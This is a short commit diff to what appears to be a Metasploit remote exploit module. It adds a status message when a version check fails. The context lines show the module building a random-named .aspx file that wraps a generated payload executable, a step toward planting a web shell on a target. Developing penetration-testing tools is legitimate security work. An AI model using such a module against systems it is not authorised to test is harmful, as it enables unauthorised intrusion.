add print_status with vuln_version?
parent
c88ddf1cc4
commit
0407acc0ec
|
@ -112,7 +112,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
return unless vuln_version?
|
||||
unless vuln_version?
|
||||
print_status("#{peer} - Cannot reliably check exploitability.")
|
||||
return
|
||||
end
|
||||
filename = "#{Rex::Text.rand_text_alpha(5)}.aspx"
|
||||
filedata = Msf::Util::EXE.to_exe_aspx(generate_payload_exe)
|
||||
|
||||
|
|
Loading…
Reference in New Issue